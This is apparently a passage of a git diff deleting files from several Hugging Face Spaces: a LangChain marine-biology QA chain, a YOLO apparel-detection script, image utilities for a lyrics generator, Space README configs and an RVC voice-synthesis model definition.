get_new_chain1(vectorstore) -> Chain: - WEAVIATE_URL = os.environ["WEAVIATE_URL"] - client = weaviate.Client( - url=WEAVIATE_URL, - additional_headers={"X-OpenAI-Api-Key": os.environ["OPENAI_API_KEY"]}, - ) - - _eg_template = """## Example: - - Chat History: - {chat_history} - Follow Up Input: {question} - Standalone question: {answer}""" - _eg_prompt = PromptTemplate( - template=_eg_template, - input_variables=["chat_history", "question", "answer"], - ) - - _prefix = """Given the following conversation and a follow up question, rephrase the follow up question to be a standalone question. You should assume that the question is related to marine biology.""" - _suffix = """## Example: - - Chat History: - {chat_history} - Follow Up Input: {question} - Standalone question:""" - eg_store = Weaviate( - client, - "Rephrase", - "content", - attributes=["question", "answer", "chat_history"], - ) - example_selector = SemanticSimilarityExampleSelector(vectorstore=eg_store, k=4) - prompt = FewShotPromptTemplate( - prefix=_prefix, - suffix=_suffix, - example_selector=example_selector, - example_prompt=_eg_prompt, - input_variables=["question", "chat_history"], - ) - llm = OpenAI(temperature=0, model_name="text-davinci-003") - key_word_extractor = LLMChain(llm=llm, prompt=prompt) - - EXAMPLE_PROMPT = PromptTemplate( - template=">Example:\nContent:\n---------\n{page_content}\n----------\nSource: {source}", - input_variables=["page_content", "source"], - ) - template = """You are an AI assistant for Wikipedia information about marine biology. -You are given the following extracted parts of a long document and a question. Provide a conversational answer with a hyperlink to the wikipedia page. -You should only use hyperlinks that are explicitly listed as a source in the context. Do NOT make up a hyperlink that is not listed. -If you don't know the answer, just say "Hmm, I'm not sure." Don't try to make up an answer. -If the question is not about marine biology, the oceans, or biology, politely inform them that you are tuned to only answer questions about marine biology. 
-Question: {question} -========= -{context} -========= -Answer in Markdown:""" - PROMPT = PromptTemplate(template=template, input_variables=["question", "context"]) - doc_chain = load_qa_chain( - OpenAI(temperature=0, model_name="text-davinci-003", max_tokens=-1), - chain_type="stuff", - prompt=PROMPT, - document_prompt=EXAMPLE_PROMPT, - ) - return CustomChain( - chain=doc_chain, vstore=vectorstore, key_word_extractor=key_word_extractor - ) - - -def _get_chat_history(chat_history: List[Tuple[str, str]]): - buffer = "" - for human_s, ai_s in chat_history: - human = f"Human: " + human_s - ai = f"Assistant: " + ai_s - buffer += "\n" + "\n".join([human, ai]) - return buffer diff --git a/spaces/EuroPython2022/Warehouse_Apparel_Detection/metadata/predictor_yolo_detector/detector_test.py b/spaces/EuroPython2022/Warehouse_Apparel_Detection/metadata/predictor_yolo_detector/detector_test.py deleted file mode 100644 index f728dcfe392de07aaa3b9e7b28b734142b15423b..0000000000000000000000000000000000000000 --- a/spaces/EuroPython2022/Warehouse_Apparel_Detection/metadata/predictor_yolo_detector/detector_test.py +++ /dev/null @@ -1,176 +0,0 @@ -import os -import shutil -import time -from pathlib import Path - -import cv2 -import torch -import torch.backends.cudnn as cudnn -from numpy import random -from PIL import Image - -from metadata.utils.utils import encodeImageIntoBase64 - -import sys -sys.path.insert(0, 'metadata/predictor_yolo_detector') - -from metadata.predictor_yolo_detector.models.experimental import attempt_load -from metadata.predictor_yolo_detector.utils.datasets import LoadStreams, LoadImages -from metadata.predictor_yolo_detector.utils.general import ( - check_img_size, non_max_suppression, apply_classifier, scale_coords, - xyxy2xywh, plot_one_box, strip_optimizer, set_logging) -from metadata.predictor_yolo_detector.utils.torch_utils import select_device, load_classifier, \ - time_synchronized - - -class Detector(): - def __init__(self, filename): - self.weights = "./metadata/predictor_yolo_detector/best.pt" - self.conf = float(0.5) - self.source = "./metadata/predictor_yolo_detector/inference/images/" - self.img_size = int(416) - self.save_dir = "./metadata/predictor_yolo_detector/inference/output" - self.view_img = False - self.save_txt = False - self.device = 'cpu' - self.augment = True - self.agnostic_nms = True - self.conf_thres = float(0.5) - self.iou_thres = float(0.45) - self.classes = 0 - self.save_conf = True - self.update = True - self.filename = filename - - def detect(self, save_img=False): - out, source, weights, view_img, save_txt, imgsz = \ - self.save_dir, self.source, self.weights, self.view_img, self.save_txt, self.img_size - webcam = source.isnumeric() or source.startswith(('rtsp://', 'rtmp://', 'http://')) or source.endswith('.txt') - - # Initialize - set_logging() - device = select_device(self.device) - if os.path.exists(out): # output dir - shutil.rmtree(out) # delete dir - os.makedirs(out) # make new dir - half = device.type != 'cpu' # half precision only supported on CUDA - - # Load model - model = attempt_load(weights, map_location=device) # load FP32 model - imgsz = check_img_size(imgsz, s=model.stride.max()) # check img_size - if half: - model.half() # to FP16 - - # Second-stage classifier - classify = False - if classify: - modelc = load_classifier(name='resnet101', n=2) # initialize - modelc.load_state_dict(torch.load('weights/resnet101.pt', map_location=device)['model']) # load weights - modelc.to(device).eval() - - # Set Dataloader - vid_path, vid_writer = 
None, None - if webcam: - view_img = True - cudnn.benchmark = True # set True to speed up constant image size inference - dataset = LoadStreams(source, img_size=imgsz) - else: - save_img = True - dataset = LoadImages(source, img_size=imgsz) - - # Get names and colors - names = model.module.names if hasattr(model, 'module') else model.names - colors = [[random.randint(0, 255) for _ in range(3)] for _ in range(len(names))] - - # Run inference - t0 = time.time() - img = torch.zeros((1, 3, imgsz, imgsz), device=device) # init img - _ = model(img.half() if half else img) if device.type != 'cpu' else None # run once - for path, img, im0s, vid_cap in dataset: - img = torch.from_numpy(img).to(device) - img = img.half() if half else img.float() # uint8 to fp16/32 - img /= 255.0 # 0 - 255 to 0.0 - 1.0 - if img.ndimension() == 3: - img = img.unsqueeze(0) - - # Inference - t1 = time_synchronized() - pred = model(img, augment=self.augment)[0] - - # Apply NMS - pred = non_max_suppression(pred, self.conf_thres, self.iou_thres, classes=self.classes, - agnostic=self.agnostic_nms) - t2 = time_synchronized() - - # Apply Classifier - if classify: - pred = apply_classifier(pred, modelc, img, im0s) - - # Process detections - for i, det in enumerate(pred): # detections per image - if webcam: # batch_size >= 1 - p, s, im0 = path[i], '%g: ' % i, im0s[i].copy() - else: - p, s, im0 = path, '', im0s - - save_path = str(Path(out) / Path(p).name) - txt_path = str(Path(out) / Path(p).stem) + ('_%g' % dataset.frame if dataset.mode == 'video' else '') - s += '%gx%g ' % img.shape[2:] # print string - gn = torch.tensor(im0.shape)[[1, 0, 1, 0]] # normalization gain whwh - if det is not None and len(det): - # Rescale boxes from img_size to im0 size - det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round() - - # Print results - for c in det[:, -1].unique(): - n = (det[:, -1] == c).sum() # detections per class - s += '%g %ss, ' % (n, names[int(c)]) # add to string - - # Write results - for *xyxy, conf, cls in reversed(det): - if save_txt: # Write to file - xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh - line = (cls, conf, *xywh) if self.save_conf else (cls, *xywh) # label format - with open(txt_path + '.txt', 'a') as f: - f.write(('%g ' * len(line) + '\n') % line) - - if save_img or view_img: # Add bbox to image - label = '%s %.2f' % (names[int(cls)], conf) - plot_one_box(xyxy, im0, label=label, color=colors[int(cls)], line_thickness=3) - - # Print time (inference + NMS) - # print('%sDone. (%.3fs)' % (s, t2 - t1)) - # detections = "Total No. of Cardboards:" + str(len(det)) - # cv2.putText(img = im0, text = detections, org = (round(im0.shape[0]*0.08), round(im0.shape[1]*0.08)),fontFace = cv2.FONT_HERSHEY_DUPLEX, fontScale = 1.0,color = (0, 0, 255),thickness = 3) - im0 = cv2.cvtColor(im0, cv2.COLOR_RGB2BGR) - return im0 - # if save_img: - # if dataset.mode == 'images': - - # #im = im0[:, :, ::-1] - # im = Image.fromarray(im0) - - # im.save("output.jpg") - # # cv2.imwrite(save_path, im0) - # else: - # print("Video Processing Needed") - - - # if save_txt or save_img: - # print('Results saved to %s' % Path(out)) - - # print('Done. 
(%.3fs)' % (time.time() - t0)) - - # return "Done" - - def detect_action(self): - with torch.no_grad(): - img = self.detect() - return img - # bgr_image = cv2.imread("output.jpg") - # im_rgb = cv2.cvtColor(bgr_image, cv2.COLOR_RGB2BGR) - # cv2.imwrite('color_img.jpg', im_rgb) - # opencodedbase64 = encodeImageIntoBase64("color_img.jpg") - # result = {"image": opencodedbase64.decode('utf-8')} - # return result - diff --git a/spaces/EuroPython2022/batangkali/README.md b/spaces/EuroPython2022/batangkali/README.md deleted file mode 100644 index 25f2fa6c6e8e0afc76403f5486d90ba0494f1dec..0000000000000000000000000000000000000000 --- a/spaces/EuroPython2022/batangkali/README.md +++ /dev/null @@ -1,13 +0,0 @@ ---- -title: Batangkali -emoji: ⚡ -colorFrom: yellow -colorTo: blue -sdk: gradio -sdk_version: 3.0.26 -app_file: app.py -pinned: false -license: gpl-2.0 ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/EuroPython2022/illustrated-lyrics-generator/utils.py b/spaces/EuroPython2022/illustrated-lyrics-generator/utils.py deleted file mode 100644 index 481397d52b50c1a2a80d3b66b8438a8058d52ff9..0000000000000000000000000000000000000000 --- a/spaces/EuroPython2022/illustrated-lyrics-generator/utils.py +++ /dev/null @@ -1,77 +0,0 @@ -# Source: https://huggingface.co/huggan/fastgan-few-shot-fauvism-still-life -import torch -import torch.nn as nn -from enum import Enum - -import base64 -import json -from io import BytesIO -from PIL import Image -import requests -import re - -class ImageType(Enum): - REAL_UP_L = 0 - REAL_UP_R = 1 - REAL_DOWN_R = 2 - REAL_DOWN_L = 3 - FAKE = 4 - - -def crop_image_part(image: torch.Tensor, - part: ImageType) -> torch.Tensor: - size = image.shape[2] // 2 - - if part == ImageType.REAL_UP_L: - return image[:, :, :size, :size] - - elif part == ImageType.REAL_UP_R: - return image[:, :, :size, size:] - - elif part == ImageType.REAL_DOWN_L: - return image[:, :, size:, :size] - - elif part == ImageType.REAL_DOWN_R: - return image[:, :, size:, size:] - - else: - raise ValueError('invalid part') - - -def init_weights(module: nn.Module): - if isinstance(module, nn.Conv2d): - torch.nn.init.normal_(module.weight, 0.0, 0.02) - - if isinstance(module, nn.BatchNorm2d): - torch.nn.init.normal_(module.weight, 1.0, 0.02) - module.bias.data.fill_(0) - -def load_image_from_local(image_path, image_resize=None): - image = Image.open(image_path) - - if isinstance(image_resize, tuple): - image = image.resize(image_resize) - return image - -def load_image_from_url(image_url, rgba_mode=False, image_resize=None, default_image=None): - try: - image = Image.open(requests.get(image_url, stream=True).raw) - - if rgba_mode: - image = image.convert("RGBA") - - if isinstance(image_resize, tuple): - image = image.resize(image_resize) - - except Exception as e: - image = None - if default_image: - image = load_image_from_local(default_image, image_resize=image_resize) - - return image - -def image_to_base64(image_array): - buffered = BytesIO() - image_array.save(buffered, format="PNG") - image_b64 = base64.b64encode(buffered.getvalue()).decode("utf-8") - return f"data:image/png;base64, {image_b64}" diff --git a/spaces/FaceOnLive/Face-Liveness-Detection-SDK/README.md b/spaces/FaceOnLive/Face-Liveness-Detection-SDK/README.md deleted file mode 100644 index 78d31828c757fb7a6b020abc26b3464b51853f81..0000000000000000000000000000000000000000 --- a/spaces/FaceOnLive/Face-Liveness-Detection-SDK/README.md +++ /dev/null @@ -1,11 +0,0 @@ ---- -title: 
Face Liveness Detection SDK -emoji: 😻 -colorFrom: yellow -colorTo: purple -sdk: docker -pinned: false -license: mit ---- - -Check out the configuration reference at https://huggingface.co/docs/hub/spaces-config-reference diff --git a/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/models_onnx.py b/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/models_onnx.py deleted file mode 100644 index 963e67b29f828e9fdd096397952054fe77cf3d10..0000000000000000000000000000000000000000 --- a/spaces/Faridmaruf/rvc-Blue-archives/lib/infer_pack/models_onnx.py +++ /dev/null @@ -1,819 +0,0 @@ -import math, pdb, os -from time import time as ttime -import torch -from torch import nn -from torch.nn import functional as F -from lib.infer_pack import modules -from lib.infer_pack import attentions -from lib.infer_pack import commons -from lib.infer_pack.commons import init_weights, get_padding -from torch.nn import Conv1d, ConvTranspose1d, AvgPool1d, Conv2d -from torch.nn.utils import weight_norm, remove_weight_norm, spectral_norm -from lib.infer_pack.commons import init_weights -import numpy as np -from lib.infer_pack import commons - - -class TextEncoder256(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(256, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class TextEncoder768(nn.Module): - def __init__( - self, - out_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - f0=True, - ): - super().__init__() - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.emb_phone = nn.Linear(768, hidden_channels) - self.lrelu = nn.LeakyReLU(0.1, inplace=True) - if f0 == True: - self.emb_pitch = nn.Embedding(256, hidden_channels) # pitch 256 - self.encoder = attentions.Encoder( - hidden_channels, filter_channels, n_heads, n_layers, kernel_size, p_dropout - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, phone, pitch, lengths): - if pitch == None: - x = self.emb_phone(phone) - else: - x = self.emb_phone(phone) + self.emb_pitch(pitch) - x = x * math.sqrt(self.hidden_channels) # [b, t, h] - x = self.lrelu(x) - x = torch.transpose(x, 1, -1) # [b, h, t] - x_mask = 
torch.unsqueeze(commons.sequence_mask(lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.encoder(x * x_mask, x_mask) - stats = self.proj(x) * x_mask - - m, logs = torch.split(stats, self.out_channels, dim=1) - return m, logs, x_mask - - -class ResidualCouplingBlock(nn.Module): - def __init__( - self, - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - n_flows=4, - gin_channels=0, - ): - super().__init__() - self.channels = channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.n_flows = n_flows - self.gin_channels = gin_channels - - self.flows = nn.ModuleList() - for i in range(n_flows): - self.flows.append( - modules.ResidualCouplingLayer( - channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - mean_only=True, - ) - ) - self.flows.append(modules.Flip()) - - def forward(self, x, x_mask, g=None, reverse=False): - if not reverse: - for flow in self.flows: - x, _ = flow(x, x_mask, g=g, reverse=reverse) - else: - for flow in reversed(self.flows): - x = flow(x, x_mask, g=g, reverse=reverse) - return x - - def remove_weight_norm(self): - for i in range(self.n_flows): - self.flows[i * 2].remove_weight_norm() - - -class PosteriorEncoder(nn.Module): - def __init__( - self, - in_channels, - out_channels, - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=0, - ): - super().__init__() - self.in_channels = in_channels - self.out_channels = out_channels - self.hidden_channels = hidden_channels - self.kernel_size = kernel_size - self.dilation_rate = dilation_rate - self.n_layers = n_layers - self.gin_channels = gin_channels - - self.pre = nn.Conv1d(in_channels, hidden_channels, 1) - self.enc = modules.WN( - hidden_channels, - kernel_size, - dilation_rate, - n_layers, - gin_channels=gin_channels, - ) - self.proj = nn.Conv1d(hidden_channels, out_channels * 2, 1) - - def forward(self, x, x_lengths, g=None): - x_mask = torch.unsqueeze(commons.sequence_mask(x_lengths, x.size(2)), 1).to( - x.dtype - ) - x = self.pre(x) * x_mask - x = self.enc(x, x_mask, g=g) - stats = self.proj(x) * x_mask - m, logs = torch.split(stats, self.out_channels, dim=1) - z = (m + torch.randn_like(m) * torch.exp(logs)) * x_mask - return z, m, logs, x_mask - - def remove_weight_norm(self): - self.enc.remove_weight_norm() - - -class Generator(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=0, - ): - super(Generator, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - 
self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - def forward(self, x, g=None): - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -class SineGen(torch.nn.Module): - """Definition of sine generator - SineGen(samp_rate, harmonic_num = 0, - sine_amp = 0.1, noise_std = 0.003, - voiced_threshold = 0, - flag_for_pulse=False) - samp_rate: sampling rate in Hz - harmonic_num: number of harmonic overtones (default 0) - sine_amp: amplitude of sine-wavefrom (default 0.1) - noise_std: std of Gaussian noise (default 0.003) - voiced_thoreshold: F0 threshold for U/V classification (default 0) - flag_for_pulse: this SinGen is used inside PulseGen (default False) - Note: when flag_for_pulse is True, the first time step of a voiced - segment is always sin(np.pi) or cos(0) - """ - - def __init__( - self, - samp_rate, - harmonic_num=0, - sine_amp=0.1, - noise_std=0.003, - voiced_threshold=0, - flag_for_pulse=False, - ): - super(SineGen, self).__init__() - self.sine_amp = sine_amp - self.noise_std = noise_std - self.harmonic_num = harmonic_num - self.dim = self.harmonic_num + 1 - self.sampling_rate = samp_rate - self.voiced_threshold = voiced_threshold - - def _f02uv(self, f0): - # generate uv signal - uv = torch.ones_like(f0) - uv = uv * (f0 > self.voiced_threshold) - return uv - - def forward(self, f0, upp): - """sine_tensor, uv = forward(f0) - input F0: tensor(batchsize=1, length, dim=1) - f0 for unvoiced steps should be 0 - output sine_tensor: tensor(batchsize=1, length, dim) - output uv: tensor(batchsize=1, length, 1) - """ - with torch.no_grad(): - f0 = f0[:, None].transpose(1, 2) - f0_buf = torch.zeros(f0.shape[0], f0.shape[1], self.dim, device=f0.device) - # fundamental component - f0_buf[:, :, 0] = f0[:, :, 0] - for idx in np.arange(self.harmonic_num): - f0_buf[:, :, idx + 1] = f0_buf[:, :, 0] * ( - idx + 2 - ) # idx + 2: the (idx+1)-th overtone, (idx+2)-th harmonic - rad_values = (f0_buf / self.sampling_rate) % 1 ###%1意味着n_har的乘积无法后处理优化 - rand_ini = torch.rand( - f0_buf.shape[0], f0_buf.shape[2], device=f0_buf.device - ) - rand_ini[:, 0] = 0 - rad_values[:, 0, :] = rad_values[:, 0, :] + rand_ini - tmp_over_one = torch.cumsum(rad_values, 1) # % 1 #####%1意味着后面的cumsum无法再优化 - tmp_over_one *= upp - tmp_over_one = F.interpolate( - tmp_over_one.transpose(2, 1), - scale_factor=upp, - mode="linear", - align_corners=True, - ).transpose(2, 1) - rad_values = F.interpolate( - rad_values.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose( - 2, 1 - ) ####### - tmp_over_one %= 1 - tmp_over_one_idx = (tmp_over_one[:, 1:, :] - tmp_over_one[:, :-1, :]) < 0 - cumsum_shift = torch.zeros_like(rad_values) - cumsum_shift[:, 1:, :] = tmp_over_one_idx * -1.0 - sine_waves = torch.sin( - torch.cumsum(rad_values + cumsum_shift, dim=1) * 2 * np.pi - ) - sine_waves = sine_waves * self.sine_amp - uv = self._f02uv(f0) - uv = F.interpolate( - uv.transpose(2, 1), scale_factor=upp, mode="nearest" - ).transpose(2, 1) - 
noise_amp = uv * self.noise_std + (1 - uv) * self.sine_amp / 3 - noise = noise_amp * torch.randn_like(sine_waves) - sine_waves = sine_waves * uv + noise - return sine_waves, uv, noise - - -class SourceModuleHnNSF(torch.nn.Module): - """SourceModule for hn-nsf - SourceModule(sampling_rate, harmonic_num=0, sine_amp=0.1, - add_noise_std=0.003, voiced_threshod=0) - sampling_rate: sampling_rate in Hz - harmonic_num: number of harmonic above F0 (default: 0) - sine_amp: amplitude of sine source signal (default: 0.1) - add_noise_std: std of additive Gaussian noise (default: 0.003) - note that amplitude of noise in unvoiced is decided - by sine_amp - voiced_threshold: threhold to set U/V given F0 (default: 0) - Sine_source, noise_source = SourceModuleHnNSF(F0_sampled) - F0_sampled (batchsize, length, 1) - Sine_source (batchsize, length, 1) - noise_source (batchsize, length 1) - uv (batchsize, length, 1) - """ - - def __init__( - self, - sampling_rate, - harmonic_num=0, - sine_amp=0.1, - add_noise_std=0.003, - voiced_threshod=0, - is_half=True, - ): - super(SourceModuleHnNSF, self).__init__() - - self.sine_amp = sine_amp - self.noise_std = add_noise_std - self.is_half = is_half - # to produce sine waveforms - self.l_sin_gen = SineGen( - sampling_rate, harmonic_num, sine_amp, add_noise_std, voiced_threshod - ) - - # to merge source harmonics into a single excitation - self.l_linear = torch.nn.Linear(harmonic_num + 1, 1) - self.l_tanh = torch.nn.Tanh() - - def forward(self, x, upp=None): - sine_wavs, uv, _ = self.l_sin_gen(x, upp) - if self.is_half: - sine_wavs = sine_wavs.half() - sine_merge = self.l_tanh(self.l_linear(sine_wavs)) - return sine_merge, None, None # noise, uv - - -class GeneratorNSF(torch.nn.Module): - def __init__( - self, - initial_channel, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels, - sr, - is_half=False, - ): - super(GeneratorNSF, self).__init__() - self.num_kernels = len(resblock_kernel_sizes) - self.num_upsamples = len(upsample_rates) - - self.f0_upsamp = torch.nn.Upsample(scale_factor=np.prod(upsample_rates)) - self.m_source = SourceModuleHnNSF( - sampling_rate=sr, harmonic_num=0, is_half=is_half - ) - self.noise_convs = nn.ModuleList() - self.conv_pre = Conv1d( - initial_channel, upsample_initial_channel, 7, 1, padding=3 - ) - resblock = modules.ResBlock1 if resblock == "1" else modules.ResBlock2 - - self.ups = nn.ModuleList() - for i, (u, k) in enumerate(zip(upsample_rates, upsample_kernel_sizes)): - c_cur = upsample_initial_channel // (2 ** (i + 1)) - self.ups.append( - weight_norm( - ConvTranspose1d( - upsample_initial_channel // (2**i), - upsample_initial_channel // (2 ** (i + 1)), - k, - u, - padding=(k - u) // 2, - ) - ) - ) - if i + 1 < len(upsample_rates): - stride_f0 = np.prod(upsample_rates[i + 1 :]) - self.noise_convs.append( - Conv1d( - 1, - c_cur, - kernel_size=stride_f0 * 2, - stride=stride_f0, - padding=stride_f0 // 2, - ) - ) - else: - self.noise_convs.append(Conv1d(1, c_cur, kernel_size=1)) - - self.resblocks = nn.ModuleList() - for i in range(len(self.ups)): - ch = upsample_initial_channel // (2 ** (i + 1)) - for j, (k, d) in enumerate( - zip(resblock_kernel_sizes, resblock_dilation_sizes) - ): - self.resblocks.append(resblock(ch, k, d)) - - self.conv_post = Conv1d(ch, 1, 7, 1, padding=3, bias=False) - self.ups.apply(init_weights) - - if gin_channels != 0: - self.cond = nn.Conv1d(gin_channels, upsample_initial_channel, 1) - - self.upp = 
np.prod(upsample_rates) - - def forward(self, x, f0, g=None): - har_source, noi_source, uv = self.m_source(f0, self.upp) - har_source = har_source.transpose(1, 2) - x = self.conv_pre(x) - if g is not None: - x = x + self.cond(g) - - for i in range(self.num_upsamples): - x = F.leaky_relu(x, modules.LRELU_SLOPE) - x = self.ups[i](x) - x_source = self.noise_convs[i](har_source) - x = x + x_source - xs = None - for j in range(self.num_kernels): - if xs is None: - xs = self.resblocks[i * self.num_kernels + j](x) - else: - xs += self.resblocks[i * self.num_kernels + j](x) - x = xs / self.num_kernels - x = F.leaky_relu(x) - x = self.conv_post(x) - x = torch.tanh(x) - return x - - def remove_weight_norm(self): - for l in self.ups: - remove_weight_norm(l) - for l in self.resblocks: - l.remove_weight_norm() - - -sr2sr = { - "32k": 32000, - "40k": 40000, - "48k": 48000, -} - - -class SynthesizerTrnMsNSFsidM(nn.Module): - def __init__( - self, - spec_channels, - segment_size, - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - spk_embed_dim, - gin_channels, - sr, - version, - **kwargs - ): - super().__init__() - if type(sr) == type("strr"): - sr = sr2sr[sr] - self.spec_channels = spec_channels - self.inter_channels = inter_channels - self.hidden_channels = hidden_channels - self.filter_channels = filter_channels - self.n_heads = n_heads - self.n_layers = n_layers - self.kernel_size = kernel_size - self.p_dropout = p_dropout - self.resblock = resblock - self.resblock_kernel_sizes = resblock_kernel_sizes - self.resblock_dilation_sizes = resblock_dilation_sizes - self.upsample_rates = upsample_rates - self.upsample_initial_channel = upsample_initial_channel - self.upsample_kernel_sizes = upsample_kernel_sizes - self.segment_size = segment_size - self.gin_channels = gin_channels - # self.hop_length = hop_length# - self.spk_embed_dim = spk_embed_dim - if version == "v1": - self.enc_p = TextEncoder256( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - else: - self.enc_p = TextEncoder768( - inter_channels, - hidden_channels, - filter_channels, - n_heads, - n_layers, - kernel_size, - p_dropout, - ) - self.dec = GeneratorNSF( - inter_channels, - resblock, - resblock_kernel_sizes, - resblock_dilation_sizes, - upsample_rates, - upsample_initial_channel, - upsample_kernel_sizes, - gin_channels=gin_channels, - sr=sr, - is_half=kwargs["is_half"], - ) - self.enc_q = PosteriorEncoder( - spec_channels, - inter_channels, - hidden_channels, - 5, - 1, - 16, - gin_channels=gin_channels, - ) - self.flow = ResidualCouplingBlock( - inter_channels, hidden_channels, 5, 1, 3, gin_channels=gin_channels - ) - self.emb_g = nn.Embedding(self.spk_embed_dim, gin_channels) - self.speaker_map = None - print("gin_channels:", gin_channels, "self.spk_embed_dim:", self.spk_embed_dim) - - def remove_weight_norm(self): - self.dec.remove_weight_norm() - self.flow.remove_weight_norm() - self.enc_q.remove_weight_norm() - - def construct_spkmixmap(self, n_speaker): - self.speaker_map = torch.zeros((n_speaker, 1, 1, self.gin_channels)) - for i in range(n_speaker): - self.speaker_map[i] = self.emb_g(torch.LongTensor([[i]])) - self.speaker_map = self.speaker_map.unsqueeze(0) - - def forward(self, phone, phone_lengths, pitch, nsff0, g, rnd, max_len=None): - if self.speaker_map is not None: # [N, S] 
* [S, B, 1, H] - g = g.reshape((g.shape[0], g.shape[1], 1, 1, 1)) # [N, S, B, 1, 1] - g = g * self.speaker_map # [N, S, B, 1, H] - g = torch.sum(g, dim=1) # [N, 1, B, 1, H] - g = g.transpose(0, -1).transpose(0, -2).squeeze(0) # [B, H, N] - else: - g = g.unsqueeze(0) - g = self.emb_g(g).transpose(1, 2) - - m_p, logs_p, x_mask = self.enc_p(phone, pitch, phone_lengths) - z_p = (m_p + torch.exp(logs_p) * rnd) * x_mask - z = self.flow(z_p, x_mask, g=g, reverse=True) - o = self.dec((z * x_mask)[:, :, :max_len], nsff0, g=g) - return o - - -class MultiPeriodDiscriminator(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminator, self).__init__() - periods = [2, 3, 5, 7, 11, 17] - # periods = [3, 5, 7, 11, 17, 23, 37] - - discs = [DiscriminatorS(use_spectral_norm=use_spectral_norm)] - discs = discs + [ - DiscriminatorP(i, use_spectral_norm=use_spectral_norm) for i in periods - ] - self.discriminators = nn.ModuleList(discs) - - def forward(self, y, y_hat): - y_d_rs = [] # - y_d_gs = [] - fmap_rs = [] - fmap_gs = [] - for i, d in enumerate(self.discriminators): - y_d_r, fmap_r = d(y) - y_d_g, fmap_g = d(y_hat) - # for j in range(len(fmap_r)): - # print(i,j,y.shape,y_hat.shape,fmap_r[j].shape,fmap_g[j].shape) - y_d_rs.append(y_d_r) - y_d_gs.append(y_d_g) - fmap_rs.append(fmap_r) - fmap_gs.append(fmap_g) - - return y_d_rs, y_d_gs, fmap_rs, fmap_gs - - -class MultiPeriodDiscriminatorV2(torch.nn.Module): - def __init__(self, use_spectral_norm=False): - super(MultiPeriodDiscriminatorV2, self).__init__() - # periods = [2, 3, 5, 7, 11, 17] - periods = [2, 3, 5, 7, 11, 17, 23, 